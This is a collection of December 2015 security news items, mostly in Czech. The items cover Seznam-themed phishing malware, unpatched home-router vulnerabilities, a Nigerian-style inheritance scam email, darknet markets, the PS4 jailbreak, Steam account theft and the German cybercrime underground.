Though the company claims Vickery was the only person to access the MacKeeper users’'information; you should still change your MacKeeper passwords and passwords on websites that use the same password.

Seznam varuje před virem. Vysává kontakty z mobilu

15.12.2015 Mobilní

Portál varuje před virovou infekcí, která se šíří mezi uživateli největšího tuzemského freemailu.
Virus funguje tak, že u nakažených počítačů se po zalogování objeví hláška, která manipuluje uživatele ke stažení aplikace. Ta si pak z telefonu stáhne všechny kontakty, ale umí i odposlechnout potvrzovací kódy třeba u internetového bankovnictví.

Seznam připomíná, že po svých uživatelích nikde nevyžaduje telefonní číslo a ani nemá žádnou aplikaci pro dočasné heslo.

Není to poprvé, kdy se uživatelé freemailových schránek na Seznamu staly obětí takového útoku. Loni v červnu se malware tvářil jako androidová aplikace Seznamu pro e-mail.

Už i Twitter prý varuje před útoky státem placených hackerů

15.12.2015 Sociální sítě

Jak to vlastně Twitter mohl poznat? A proč tu máme módu podobných varování, zejména v tak vágní a nic neříkající podobě?
PR mašinerie Facebooku někdy zhruba před měsícem přišla s tím, že vypustí do světa historku o tom, jak se státem placení hackeři snaží hacknout účty na Facebooku a jak proti tomu bude Facebook bojovat. Už tehdy to bylo takové dost podivné, hlavně z hlediska toho, jak asi Facebook pozná, že je to právě „státem placený“ hacker. Ale účel to splnilo, média o tom psala, chválila a slepě kopírovala, co PR oddělení Facebooku napsalo.

Podle Twitter warns some users of possible ‚government‘ hacking je teď na řadě s varováním před hackováním „vládami“ Twitter. Vše je opět takové trochu nejisté, protože to vychází z e-mailu, který teoreticky měl poslat Twitter jenom některým uživatelům. Trochu podivně působí i to, že by zrovna Twitter doporučoval používat Tor, místo toho, aby uživatele informoval o tom, jak lépe zabezpečit účet.

Podle výše uvedeného článku mluvčí Twitteru prý potvrdil autenticitu e-mailů, ale žádné bližší informace neposkytl. Čímž to vlastně celé můžeme uzavřít u téhož jako v případě Facebooku. Vágní varování před něčím, co je poměrně jasné. Pokud je někdo aktivista, politicky činný, v opozici vůči nějaké vládě nebo prostě jenom osinou v zadku nějakému režimu, tak je dost jasné, že se leckdo bude snažit získat přístup k online účtům. Včetně snah získat odtamtud informace, zejména takové, které by případně pomohly odhalit, odkud třeba své příspěvky píše.

Na varování od Twitteru je trochu zvláštní to, že se zmiňuje o snahách hackerů získat právě IP adresy, protože to je informace, která není v rámci případně hacknutého účtu dostupná. Jediné, co by se hackem účtu na Twitteru dalo získat, je telefonní číslo, které by případná oběť měla vyplněné, a e-mail, ze kterého je účet spravován. Pokud by někdo byl aktivista a zároveň tak neopatrný, že by používal geolokaci, tak na to potřeba hacker není – informace jsou volně dostupné jak u tweetů, tak případně u fotografií (pokud je tam sociální síť nechá uložené, nemusíme nutně řešit pouze Twitter).

Můžete být poněkud více paranoidní a můžete si varování Twitteru vykládat jako snahu hackerů dostat se nikoliv na váš účet, ale přímo do systému Twitteru. Tam by se totiž mohli dostat k IP adresám. Ale to už by byla hodně velká záležitost a Twitter by se spíše měl pochlubit nějakými konkrétnějšími informacemi. Než vágním povídáním o „hackerech“ placených „vládami“.

Routery jsou zamořeny chybami: Belkin, ZyXEL, Netgear a další

15.12.2015 Zranitelnosti

Bezdrátové routery určené pro domácnosti a malé kanceláře jsou zamořeny bezpečnostními chybami, na které neexistují záplaty. Chyby byly objeveny v routerech různých značek, včetně těch nejznámějších: ZyXEL, Belkin, ReadyNet, Amped Wireless, Buffalo a Netgear. Stejné problémy se přitom opakují už mnoho let.

Belkin tento měsíc podruhé

Bezpečnostní analytik John Garrett z Ethical Reporting objevil několik nových vážných zranitelností v bezdrátových routerech značky Belkin. Konkrétně jsou postiženy routery s označením AC-1750, AC-1200, N-600 a N-150.

Objeveno bylo několik problémů včetně path traversal (procházení adresářů v systému mimo document root) použitelných k útokům na různá API, slabiny umožňující měnit konfiguraci routerů, obcházení autentizace nebo dokonce vzdálené spouštění škodlivého kódu.

Garrett zveřejnil videa ukazující, jak je možné jednotlivé routery napadnout i při použití nejnovějšího oficiálního firmware. Upozornil také na to, že routery Belkin a Linksys (stejný majitel) obsahují aktualizační rozhraní, které samo o sobě otevírá velkou bezpečnostní díru. Belkin už na objevené zranitelnosti zareagoval a potvrdil, že připravuje aktualizaci firmware se záplatami.

Není to první aktuální problém s těmito routery, na začátku prosince indický analytik Rahul Pratap Singh objevil několik zranitelností zneužitelných ke kompromitování routeru. Je možné pomocí nich například shodit webové rozhraní routeru, odhadnout session ID a zneužít otevřený telnet s přihlašovacími údaji root/root.

Netgear s falešnými DNS záznamy

Joel Land ze CERT Coordination Center (CERT/CC) na Carnegie Mellon University zveřejnil minulý týden celou řadu bezpečnostních hlášení, které informují o bezpečnostních dírách v různých modelech routerů.

Objevil, že Netgear G54/N150 (WNR1000) s nejnovějším firmwarem a zřejmě i staršími obsahuje chybu s označením CVE-2015–8263, která může být zneužita k injektování falešných DNS záznamů, které jsou pak předávány klientům. Uživatelé tak mohou být potichu směrováni na phishingové servery, které jsou řízené útočníkem.

Router je náchylný na klasické otrávení DNS cache (zdokonalené v podobě Kaminského zranitelnosti), které je staré přes sedm let. Používá jeden zdrojový port pro všechny DNS dotazy, takže je pro útočníka snadné vytvořit falešnou odpověď, která bude omylem spárována s legitimním požadavkem. Požadavky a odpovědi se párují jen podle čísla portu a odhadnutelného 16bitového query ID.

ZyXEL s heslem 1234

Jiné aktuální varování od CERT/CC obsahuje dvě chyby zneužitelné v routeru ZyXEL NBG-418N s firmware 1.00(AADZ.3)C0. Výrobce byl o chybách informován už v říjnu. Opět byly objeveny odhadnutelné výchozí přihlašovací údaje admin/1234, které mohou být zneužity pro vzdálené přihlášení k zařízení (CVE-2015–7283).

Chybu je možné kombinovat se zranitelností cross-site request forgery (CSRF), která byla už dříve objevena ve stejném routeru (CVE-2015–7284). Vzdálený útočník ji může zneužít ke spuštění vlastního kódu ve stejném kontextu, v jakém běží administrace routeru u řádného uživatele.

Útočník tedy může vzdáleně provádět akce se stejným oprávněním jako správce, pokud má uživatel otevřené aktivní spojení s routerem, přes které může přijímat útočníkem podvržené žádosti. V kombinaci s výchozími přihlašovacími údaji navíc může útočník otevřít přístup sám a nemusí čekat na to, až se oběť do administrace přihlásí.

Chyby v routerech ReadyNet, Amped Wireless a Buffalo

Bezpečnostní odborníci z CERT/CC také upozornili na výchozí přihlašovací údaje (CVE-2015–7280), a zranitelnost CSRF (CVE-2015–7281) a DNS spoofing (CVE-2015–7282) v routerech značky ReadyNet. Objevené problémy byly testovány na routeru ReadyNet WRT300N-DD s firmware 1.0.26. Výrobce se o nich dozvěděl už v září.

Podobně byly výchozí přihlašovací údaje (CVE-2015–7277), CSRF (CVE-2015–7278) a DNS spoofing (CVE-2015–7279) objeveny v routeru Amped Wireless R10000 s firmware Výrobce dostal informace už v červenci.

Chybu umožňující DNS spoofing (CVE-2015–8262) mají také routery Buffalo AirStation Extreme N600 routers (WZR-600DHP2). Týká se verzí firmware 2.09, 2.13, 2.16 a pravděpodobně i dalších.

Stále stejná písnička

Je neuvěřitelné, že se už deset (a více) let objevují stále stejné chyby: děravé webové rozhraní, špatně nastavený web server, webové rozhraní otevřené do internetu, trapné výchozí přihlašovací údaje a nefunkční kontrola aktuálního firmware. V nejhorším případě je možné se na dálku dostat k paměti routeru včetně veškerého nastavení a hesel.

Dokud tento problém nebudeme schopni uspokojivě vyřešit, můžeme se bezpečností zabývat stále dokola, ale naše data budou od routeru putovat bůhvíkam. Elegantně to řeší projekt OpenWRT, který připravuje alternativní linuxový firmware pro mnohé routery a pravidelně ho aktualizuje. Otázkou je, proč ho některý z výrobců nepřevezme a nepoužije ve svém hardware, místo aby na koleně bastlil vlastní a zjevně děravé řešení.

Podvodníci se vydávají za e-mail Seznamu, snaží se připravit lidi o peníze

15.12.2015 Phishing
Českým internetem se začal opět šířit počítačový virus, který se vydává za oficiální aplikaci Emailu. Prostřednictvím něho se snaží kybernetičtí zločinci přesvědčit uživatele, aby si do svého mobilu nainstalovali další podvodnou aplikaci. Ta jim pak umožní klidně i vysát cizí bankovní účet, dovedou totiž obejít i potvrzení prostřednictvím SMS zprávy.
Dnes 14:47
U počítačů nakažených virem se po přihlášení k Emailu objeví hláška, že česká internetová jednička zavádí novou technologii One-Time-Password.

„One-Time-Password je systém generace jednorázových hesel pro vstup do vašeho účtu, které jsou platné během jedné minuty. Pro vaše pohodlí jsme připravili jednoduchou a pohodlnou aplikaci určenou pro chytré telefony. Nyní při každém přihlášení k vašemu účtu potřebujete otevřít naší aplikaci,“ tvrdí podvodníci v podvodném vyskakujícím okně.

Nikoho nevybízíme k žádné instalaci kvůli přihlášení k našim službám.
mluvčí Seznamu Irena Zatloukalová
Problém představuje především to, že se virus aktivuje až při přihlášení k Emailu, do té doby se pouze ukrývá v útrobách operačního systému. Někteří uživatelé si tak mylně mohou myslet, že se skutečně jedná o oficiální výzvu Seznamu.

Takovým způsobem ale společnost s uživateli nikdy nekomunikuje. „Žádnou aplikaci pro dočasné heslo nemáme. Nikoho zároveň nevybízíme k žádné instalaci kvůli přihlášení k našim službám. Podobné chování počítače je způsobeno počítačovým virem,“ uvedla pro mluvčí Seznamu Irena Zatloukalová.

Podle ní je škodlivý kód nejčastěji šířen prostřednictvím serverů pro hromadné sdílení dat, přibalen může být například k pirátským kopiím nějakého softwaru. Stejně tak se ale tento nezvaný návštěvník může v počítači zabydlet po otevření příloh nevyžádané pošty a podobně.

Ovládnou celý mobil
Prostřednictvím podvodné aplikace nazývané SeznamOTP získají útočníci plný přístup k napadenému chytrému telefonu. Díky tomu mohou odposlouchávat internetovou komunikaci, a to včetně zadávaných hesel, i manipulovat s příchozími zprávami.

Ve chvíli, kdy mají útočníci plnou kontrolu nad chytrým telefonem, mohou snadno získat přístup například i k autorizačním zprávám internetového bankovnictví. Poté jsou jen krůček od toho, aby lidem vybílili účet nebo si prostřednictvím něj sjednali nějakou půjčku.

Prakticky stejný scénář měly také útoky, které začaly terorizovat uživatele českého internetu loni v červnu. [celá zpráva]

Jak probíhá útok krok za krokem, naleznete na obrázcích níže.

1. V prvním kroku se podvodníci snaží po uživateli vylákat mobilní číslo.
2. Aby uživatel nepojal podezření, útočníci popisují stejně jako u legitimních instalací každý krok dopředu.
3. Že chování podvodné aplikace není standardní, mohou uživatelé poznat podle toho, že instalace probíhá bez ověření.
4. V dalším kroku sama aplikace upozorňuje, že získá přístup prakticky ke kompletní administraci telefonu. Méně pozorní uživatelé si toho ale nemusejí všimnout.

5. Originálním logem Emailu se program snaží navodit dojem, že je nainstalována originální aplikace.
6. Že instalace podvodné aplikace na mobilu skutečně proběhla, ověřují podvodníci „licenčním“ klíčem.

Bezpečnost v roce 2020? Intel se podíval do křišťálové koule

15.12.2015 Bezpečnost
Pětiletý výhled se pokouší předpovědět, jakým způsobem se budou měnit povahy hrozby, jak se bude měnit chování a cíle útočníků a jak bude odvětví na tyto výzvy v horizontu příštích pěti let reagovat.

Útoky pod OS. Útočníci by se mohli zaměřit na slabá místa ve firmwaru a hardwaru, neboť aplikace a operační systémy jsou proti konvenčním útokům stále lépe zabezpečené. Lákadlem nepochybně bude široká míra kontroly, již mohou útočníci prostřednictvím těchto útoků získat, neboť se tak budou moci dostat k neomezenému počtu zdrojů a zmocnit se administrativních i kontrolních funkcí.
Vyhýbání se detekci. Útočníci se pokusí vyhnout zjištění zaměřením na jiné cíle, přičemž budou používat sofistikované metody útoku a aktivně se budou vyhýbat bezpečnostní technologii. K obtížně zjistitelným stylům útoku budou patřit bezsouborové hrozby, šifrované infiltrace, malware zajišťující vyhýbání se sandboxům, zneužívání vzdálených skořápek a protokolů vzdálené kontroly, stejně jako výše zmíněné útoky pod OS zaměřené na MBR, BIOS a firmware.
Nová zařízení, nové plochy pro útok. I když zatím nedošlo k nárůstu útoků přes IoT a elektroniku integrovanou do oblečení, lze očekávat, že do roku 2020 dosáhne instalovaná základna dostatečné úrovně na to, aby přilákala útočníky. Dodavatelé technologií a poskytovatelé vertikálních řešení budou společně usilovat o vytvoření návodu pro bezpečné používání a vytvoření osvědčených postupů, stejně jako zabudování bezpečnostních funkcí do architektury zařízení tam, kde to jen bude možné.
Kybernetická špionáž v korporátním hávu. McAfee Labs očekává, že černý trh s malwarem a službami pro hacking by mohl umožnit použití malwaru pro kybernetickou špionáž ve veřejném sektoru a že korporátní útoky mohou být použity pro shromažďování finančních informací a manipulace trhů ve prospěch útočníků.
Ohrožení soukromí, příležitost. Objem a hodnota osobních digitálních dat bude nadále vzrůstat, což bude dál lákat kybernetické zločince a potenciálně povede k novým regulacím soukromí po celém světě. Současně s tím budou jednotlivci vyhledávat a též získávat kompenzace za sdílení svých dat a kolem této „hodnotové výměny“ se vytvoří trh, přičemž prostředí utvářené tímto trhem by mohlo změnit to, jak budou jednotlivci a firmy přistupovat k digitálnímu soukromí.
Odpověď bezpečnostního odvětví. Bezpečnostní odvětví bude vyvíjet efektivnější nástroje k detekci nepravidelných uživatelských aktivit, které by mohly indikovat narušené účty. Sdílení informací povede k rychlejší a lepší ochraně systémů. Bezpečnostní zařízení integrovaná s cloudem nabídnou lepší viditelnost a kontrolu. Technologie automatizované detekce a korekce slibuje ochranu firem před nejběžnějšími typy útoků, což uvolní IT oddělení ruce zaměřit se na kritické bezpečnostní incidenty.

Kořenový certifikát Symantecu je podle Googlu nedůvěryhodný

15.12.2015 Hrozby
Správci webových stránek a vývojáři, kteří pracují se některými certifikáty od Symantecu, by si měli obstarat nové.

Android OS, prohlížeč Chrome a další produkty Googlu přestanou důvěřovat certifikátům navázaným na dvacet let starý VeriSign root certificate.

Zpráva se objevila poté, co společnost Symantec odhalila plány na postupné utlumení certifikačních autorit Class 3 Public Primary Certification Authority, které získala před pěti lety.

V oznámení, které společnost ke konci podpory zveřejnila, uvádí, že kořenový certifikát důvěryhodný pro většinu prohlížečů i operačních systémů, nepoužívá už od 1. prosince a doporučuje všem majitelům digitálních certifikátů na něj navázaných, aby si obstarali nové, navázané na modernější kořenový certifikát. Všechny jsou k dispozici zdarma.

Podle Googlu Symantec nepřestane Class 3 Public Primary CA používat zcela, ovšem plánuje ho využívat pro jiné, dosud nepřiblížené účely. Výrobce oblíbeného prohlížeče však nemůže zaručit, že neveřejné certifikáty vydané pod daným rootem, nebudou zneužity k „narušení nebo ovlivnění bezpečné komunikace produktů Googlu nebo jejich uživatelů“.

„Jelikož Symantec se zdráhá blíže specifikovat nové způsoby využití těchto certifikátů a jelikož si je firma vědoma rizika, které takové jednání představuje pro uživatele produktů Google, požádala nás, abychom tento kořenový certifikát odebrali a přidali na seznam nedůvěryhodných,“ vysvětluje Ryan Sleevi, jeden z vývojářů Googlu.

Na seznam nedůvěryhodných tak společnost přidává dvě verze Class 3 Public Primary CA, jednu podepsanou postupně čím dál tím méně užívanou hašovací funkcí SHA-1, druhou podepsanou ještě starší MD2. Obě byly vydány v roce 1996 a jejich platnost by měla vypršet v roce 2028.

Podle Googlu se však Symantec nedomnívá, že by některý z jeho klientů spravujících HTTPS stránky, nebo jejich uživatelé, měli být tímto krokem ovlivněni. Ve svém vlastním upozornění přitom Symantec připouští, že uživatelé, pokoušející se navštívit webové stránky navázané na nedůvěryhodný kořenový certifikát, se v budoucnu mohou setkat s chybovými hlášeními.

To se může týkat rovněž podepsaných aplikací, jestliže i výrobci operačních systémů začnou odebírat Class 3 Public Primary CA ze seznamu důvěřovaných. Certifikáty by proto měli aktualizovat i dotčení vývojáři.

Už v listopadu Symantec informoval všechny velké výrobce internetových prohlížečů také o tom, ať stáhnou ze seznamu důvěryhodných certifikátů VeriSign Class 3 Public Primary CA G1 (PCA3-G1), jelikož je založen na starším, méně bezpečném systému ochrany.

Tento kořenový certifikát však už několik let nebyl ke generování nových certifikátů využíván, proto by jeho stažení nemělo pro svět veřejného internetu představovat žádné riziko. Podle mluvčího Symantecu Noaha Edwardsena jej chce společnost používat pouze interně, jako podpůrný, pro firemní klientelu.

Falešný bankéř nabízí v e-mailu čtvrt miliardy korun nalezených na účtech

15.12.2015 Spam
Stačí poslat kontaktní údaje a pohádkové dědictví je vaše. Tuto lákavou nabídku rozesílá e-mailem člověk, který si říká Andrew Brown. S největší pravděpodobností se ovšem jedná o podvodníka.
„Ahoj, kamaráde Já jsem Dr. Andrewa Browna auditu vedoucí oddělení NATWEST BANK LONDON Harlesden,“ tak začíná e-mail, který má redakce Práva k dispozici.

Následuje obchodní návrh, který – jak Brown lámanou češtinou evidentně z internetového překladače vysvětluje – bude přínosný pro obě strany.

„V mém oddělení být šéf operace větší regionální kanceláře v Londýně jsem objevil částku ve výši 16,5 miliónu liber (627 miliónu korun) v účtu že patří do jedné z našich zahraničních zákazníků,“ shrnuje svoji situaci Brown.

Peníze mají být židovského multimilionáře z Mexika Tomáše Saby Masriho, který zemřel před pěti lety při letecké nehodě. Společně s ním zahynula i jeho žena, syn a snacha.

„Pilot byl také mrtvá,“ dodává Brown a tím hasnou všechny naděje na šťastný konec.

Lákavá nabídka
Po tragické pasáži přichází ovšem ta lákavá. Brown vysvětluje, že žádní příbuzní zesnulého multimilionáře se o dědictví nepřihlásili, ačkoli na ně čekal dost dlouho. A na řadu tak přichází příjemce e-mailu.

„Mám usilovat o váš souhlas k vám jako další příbuzný / bude příjemce zemřelého tak, že výtěžek z tohoto účtu oceněn na 16,5 milionů liber, může být vyplacena na vás,“ nabízí Brown s tím, že 60 procent si nechá a 40 procent převede na vás. Výsledná částka tedy je zhruba 251 miliónů korun.

Brown přiznává, že byste se za příbuzného měli vydávat právě vy, abyste si společně mohli dědictví rozdělit. Samozřejmě přitom apeluje na důvěru, spolupráci a dodává, že se vše vyřídí u soudu a proběhne to legální cestou.

„Bude popraven“
„Já vám zaručit, že to bude popraven za legitimní uspořádání, které vás ochrání před jakékoli porušení zákona,“ dodává, přičemž pravděpodobně myslí druhý význam anglického slova „executed“, tedy vykonán.

Brown následně příjemce ­e-mai­lu žádá, aby mu zaslal své kontaktní údaje, ideálně rychle, protože má jenom sedm dní na vyřízení.

Stačí tedy jenom uvést jméno a příjmení, telefonní číslo, kontaktní adresu, povolání, věk, pohlaví a státní příslušnost a časem se podle jeho slibů stane oslovený člověk majitelem 251 miliónů korun.

„Usilovat o to, dejte mi vědět vaše rozhodnutí, spíše než mě čekat,“ uzavírá svoji nabídku Brown. Vzhledem k špatnému překladu je celý e-mail obtížně čitelný. Je pod ním ale anglická verze, která je srozumitelnější.

Rozhodně neodpovídat
Celá věc vypadá jako jednoznačný podvod, navíc ne příliš promyšlený. Není totiž jasné, proč by měl bankéř z Londýna posílat dědictví po zesnulém židovském multimilionáři z Mexika do ČR. Policie má v této souvislosti v otázce možných podvodných e-mailů jasno.

„Tam je jediná rada: na takové e-maily neodpovídat. Rozhodně nikam neposílat peníze nebo neuvádět své osobní údaje anebo přístupové údaje k internetovému bankovnictví,“ upozornil mluvčí Útvaru pro odhalování organizovaného zločinu Pavel Hanták.

Právě tamní policisté vyšetřují počítačovou kriminalitu a podobné podvodné snahy o vylákání osobních údajů či přímo peněz od důvěřivých lidí.

Darknet: Temná stránka internetu

15.12.2015 Bezpečnost
Prostor pro obchodování se zbraněmi, drogami, dětskou pornografií či nelegálními sázkami. To všechno nabízí podsvětí na internetu obecně označované jako darknet -- a zapojují se do něj i Češi.

Darknet funguje jako skrytá vrstva klasického internetu, operuje na principu anonymního připojení skrze šifrované decentralizované sítě komunikující přímo mezi jednotlivými uživateli (peer-to-peer).

Požadavky, které normálně odesíláte ze své IP adresy, jdou přes náhodně vybrané uzly a vy jste tak laicky řečeno neviditelní. K přístupu na darknet slouží řada prohlížečů, nejoblíbenějšími jsou např. Tor, I2P nebo Freenet.

„Tor je založen na přeposílání komunikace přes síť serverů zapojených do systému, kde internetové adresy odesílatele a příjemce nejsou obě najednou čitelné v žádném kroku cesty, takže příjemce zná pouze adresu posledního zprostředkujícího stroje a není tedy možné určit, kdo s kým komunikuje. Data jsou zasílaná od odesílatele šifrovaně k prvnímu onion routeru v řetězci a veškerá další komunikace mezi routery je taktéž šifrována (každé spojení jiným sdíleným klíčem),” tvrdí Vladimír Smejkal, autor knihy Kybernetická kriminalita.

Podle něj každý router má informaci jen o tom, od koho data přijal a kam je má přeposlat. Obsah dat nebo jejich zdroj tedy nelze vysledovat. Navíc přístup do této utajené sítě je možný jen pro její uživatele a zvenčí, pro běžné uživatele Internetu, je síť nepřístupná.

Je proto prý ideální pro všechny, kdo chtějí cíleně nebo blíže neurčenému okruhu účastníků zasílat informace a sdílet je s nimi při minimálním riziku odhalení.

Příkladem hanebného chování může být aktivita on-line tržiště označovaná jako Hedvábná stezka, která fungovala v podstatě jako eBay pro drogy. Burza s obratem 1,5 miliardy dolarů je již nefunkční a její provozovatel Ross Ulbricht dostal doživotí. Takových tržišť je však celá řada a boj autorit s nimi tak je sisyfovskou prací. Případ ale ukázal, že ani darknet není neprolomitelný.

Mezi nejvýznamnější darknety patří příklad Alphabay, Ramp či German Plaza. Podle expertů v česku jejich obdoba zřejmě neexostuje, nicméně čeští uživatelé využívají ty zahraniční.

Největší boom v počtu denních přístupů tuzemských uživatelů nastal na konci září 2013, kdy přesáhl hranici 40 000. Od té doby přišel značný pokles a udržuje se tak lehce pod hranicí 15 000 denních přístupů.

Ve srovnání s ostatními státy jsme tak darknetovým trpaslíkem, v celkovém umístění podle počtu denních přístupů se řadíme někam mezi Řecko a Saudskou Arábii. Žebříčku kralují Rusko, Německo, a zejména USA, které mají až 400 000 denních přístupů.

„Ač se Česko jeví z pohledu těchto statistik jako zanedbatelný hráč, je naopak velmocí co se prosazování technologií s darknetem spojovaných týče. Konkrétně ve zmiňované síti Tor, hojně využívané po celém světě pro anonymní přístup k informacím v i mimo darknet, patříme na špičku z pohledu počtu hostovaných tzv. „exit nodů“ na území České Republiky. Jedná se o servery, přes které vede komunikační cesta všech uživatelů dané sítě,” říká Jiří Slabý, Senior Manager v oddělení Consultingu společnosti Deloitte.

Co se obsahu týče, má česká darknetová komunita spíše povahu nadšenců, kteří se zajímají o moderní technologie, než kriminálníků se zálibou v IT.

Dokladem toho může například například hackerspace Brmlab, jenž má sídlo v pražských Holešovicích. Jde o otevřenou komunitu, jejímž cílem je sdílet informace a nápady s podobně zaměřenými nadšenci, pořádá také četná společenská setkání a workshopy pro zájemce.

Hacker claims Sony PlayStation 4 Jailbreak


The dream comes true for many Sony PlayStation 4 users, a hacker has developed a Jailbreak for the popular armored console.
The Sony PlayStation 4 is considered one of the most protected platform, since now it was impossible to run pirated games, but a hacker who calls himself CTurt claimed to develop a fully jailbroken version of the PlayStation 4 with the help of a kernel exploit that he previously created.

sony playstation 4

CTurt exploited the hack in PlayStation 4 v1.76 to inject malicious code in the PS4 and gain control of the gaming platform.

“Just broke WebKit process out of a FreeBSD jail (cred->cr_prison = &prison0). Guess you could say the PS4 is now officially “jailbroken” :P” states a Tweet sent by CTurt.

play station 4 jailbreak

According to the above message, currently the exploit only works for PlayStation 4 firmware version 1.76, but the expert believes that it can be modified to work for more recent firmware.
How does it work?

According to the hacker, the jailbreak allows dumping of the Sony PlayStation 4 RAM from other processes and allows the installation of a custom firmware, which could be exploited by hackers to run homebrew applications that aren’t normally not allowed by the security restriction implemented by Sony.

“While it could take time before CTurt and other hackers are able to develop custom firmware along with the method to load it on the video game console, it should be noted that the exploit can also be taken advantage of to have the console run pirated software.” reported

Clearly it the news will be confirmed we will observe a huge impact on the gaming market.

Which will be the reply of the Sony?
Obviously, the company will analyze the exploit in order to discover the vulnerabilities exploited by the hacker and fix them for the most recent version of Play Station 4 firmware.

Každý měsíc útočníci na Steamu ukradnou 77 tisíc účtů

14.12.2015 Incidenty

Pokud používáte herní platformu Steam, je možná vhodný čas pojistit si účet dvoufaktorovým ověřením. Účty se totiž ve velkém kradou.
Steam – – je užitečné místo pro pořizování her. Ať už těch zdarma, na zkoušku, nebo za peníze. Za roky existence se Steamu (Valve) podařilo vytvořit dobře použitelný obchod s počítačovými hrami. Úměrně popularitě, ale hlavně také tomu, že se účty na Steamu dají používat jak pro nákup, tak prodej (virtuálního zboží), stoupá i zájem útočníků.

V Security and Trading Valve upozorňuje, že krádeže účtu se na Steamu vyskytují od samého počátku, ale právě po zavedení možnosti obchodovat mezi uživateli (Steam Trading) došlo až ke dvacetinásobnému růstu počtu krádeží.

Většinou to probíhá tak, že útočník ukradne váš účet, prodá všechno, co se na něm prodat dá, a získá peníze. V řadě případů se prodej neuskuteční bezprostředně z ukradeného účtu, věci změní majitele několikrát a prodány jsou z účtu zcela jiného. Ukradené věci ani nemusí být prodány rychle, hackeři klidně i několik měsíců počkají.

Firma Valve původně okradeným uživatelům vycházela vstříc a ukradený účet, včetně na něm se vyskytujících věcí, jim vracela. Počet krádeží je ale natolik velký, že podobné řešení přestává být jediné přijatelné. Navíc, jak Valve upozorňuje, krádeže se dnes už netýkají pouze nezkušených a nepozorných uživatelů. Ve výše uvedeném upozornění Valve uvádí, že krádeže účtů na Steamu má dnes na svědomí vysoce organizovaná síť a jde až o 77 tisíc odcizených účtů měsíčně.

Valve doporučuje velmi vážně myslet na dvoufaktorové ověření a k účtu na Steamu si přidat autentikátor. Pro Valve ale i toto řešení znamenalo některé nové problémy, například to, že pokud by dvoufaktorové ověření probíhalo na kompromitovaném PC, nefungovalo by to.

Vedle zavedení dvoufaktorového ověření se Valve ještě pokouší ochránit účty, které nejsou dvoufaktorem chráněny. Zavádí pro ně řadu omezení v rychlosti obchodování, což v zásadě je další dobrou motivací pro pořízení si autentikátoru.

Twitter varoval před hackerskými útoky. Podezření padá na Čínu a Severní Koreu

14.12.2015 Sociální sítě
Sociální síť Twitter upozornila některé uživatele, že státem podporovaní hackeři se možná pokusili získat citlivé údaje z jejich účtů. Podle agentury Reuters je to první takové varování, které Twitter vydal.
Přihlašovací stránka Twitteru
Hackeři si prý vzali na mušku "malou skupinu účtů". Nic ale nenaznačuje, že se jim podařilo citlivé informace získat. Společnost neuvedla, koho ve svém vyšetřování podezírá.

Varování od Twitteru v pátek obdržela kanadská nezisková organizace Coldhac. Hackeři se prý mohli snažit ukrást údaje jako "e-mailové adresy, IP adresy a/nebo telefonní čísla". Jeden z jejích šéfů Colin Childs řekl Reuters, že organizace žádný zjevný dopad tohoto útoku nezaznamenala.

Terčem kybernetických útoků se západní společnosti a vlády staly už dříve. V podezření se ocitly vlády Číny a Severní Koreje. Vláda v Pchjongjangu ale jakýkoli podíl na narušení bezpečnosti vytrvale odmítá.

Inside the German cybercriminal underground

Trend Micro investigated on German crime forums and concluded that Germany possesses the most advanced cybercrime ecosystem in the European Union.
We have reported several times the news related to various criminal cybercriminal underground underground communities in the wild, such as American underground, the Russian underground, the Brazil underground, the Chinese underground and also the Japanese one.

What about the European cybercriminal underground?

This time, we will talk about the Germany cybercriminal underground, Trend Micro investigated on German crime forums and concluded that Germany possesses the most advanced cybercrime ecosystem in the European Union, beating known markets as the French and Spanish.

The Trend Micro survey examined 10 big crime forums, some of them holding a registered, active base between 20.000 and 70.000 users. The findings of the investigation are available in the paper titled U-Markt: Peering into the German Cybercriminal Underground.

German cybercriminal underground prices

“The German underground does not have as wide a selection of offerings as the Russian market. In most cases, it isn’t necessary to search for special goods and services in local communities because global (English-speaking) markets have more to offer. But when it comes to customized wares, it is harder to find appropriate equivalents. This is a niche that smaller communities (like the German underground) need to find in order to thrive and stay up.” Reads the paper-

In these places, it is quite easy to buy any kind of illegal product and service including:

Malware (Trojans, bank-stealers, and backdoors)
Bulletproof hosts(BPHSs), to used to store malware components, exploit kits.
Fake IDs
Hacked accounts
Crypting services
In terms of banner ads, “are an easy way to promote partner sites (a marketplace run by those behind a certain forum in any community, most notably in the Russian underground). These can help marketplaces widen their client bases.”

German cybercriminal underground banners

Very interesting is the Packstation service described in the report as a delivery method exploited by criminals and that takes advantage of the German postal service.

“Most underground markets rely on droppers who cash in stolen credit cards and online accounts. There is no longer a need for droppers in the German underground. Users instead rely on the so-called “Packstation service” that takes advantage of the German postal service. This allows sellers to put goods sold in publicly accessible metal boxes for their buyers to pick up using their pTANs and access cards.”

The advantage of the “Packstation” redides in the fact that cybercriminals can easily perform “exchange of goods and payment. Users’ addresses cannot be tracked though they need to apply for the service using a physical (home) address and a mobile phone number (which are easy to fake) so they can receive short messaging service (SMS) notifications alongwith their pTANs to claim their parcels”

German cybercriminal underground packstation

What does really make the Germany cybercriminal underground the most advanced cyber-crime in the all European Union? The answer is Russia, because both the German and the Russian underground forums are full of carding service banner ads. These adds are normally associated with Russian underground offerings but heavily advertised in German forums.

A good examples is “”, one of Russia’s biggest stolen credit card marketplaces that is being advertised in the German underground, also “” but there are more.

Trend Micro also published the list of usernames per forums, probably to help future investigations.

I believe we will keep seeing more and more news about this cybercriminal underground due to the rapid growth of black markets.

This is How Tokyo Police Catching Rogue Drones in the Sky
This Police Drone Fights Rogue Drones in the Sky
So how do you catch rogue drones that take your sky?
With another Giant Drone, of course!
This is exactly how the Tokyo Metropolitan Police Department is catching unwanted and potentially dangerous drones flying over the city, according to Japan Today.
The department is launching an anti-drone squad in order to prevent people from flying their drones overcrowded residential areas and important buildings in Tokyo, including the Prime Minister's Office.
How So?
Instead using a dragnet on the ground, the police authorities will use a drone armed with a net to scoop up the suspected drones and carry them away to safety.
Watch the Video:

The Tokyo Metropolitan Police have also released a video that shows its special Net-Wielding Drone in action. You can look at the video above.
It looks like the police are using a DJI Spreading Wings 900 with a 3 x 2 m² of Net tied to its feet.
As soon as a rogue drone is spotted in the sky, the squad will first attempt to contact its operator and order them to land the drone.
However, if the drone operator fails to comply, the anti-drone squad will release their Net-Wielding Drone to capture the drone and drag it away to safety.This move came in the wake of last April's incidence when they found a suspicious drone carrying radioactive material from the Fukushima Prefecture onto the roof of the Japan Prime Minister's Office.

Hacker Confirms PlayStation 4 Jailbreak! Exploit Could Open Doors for Pirated Games
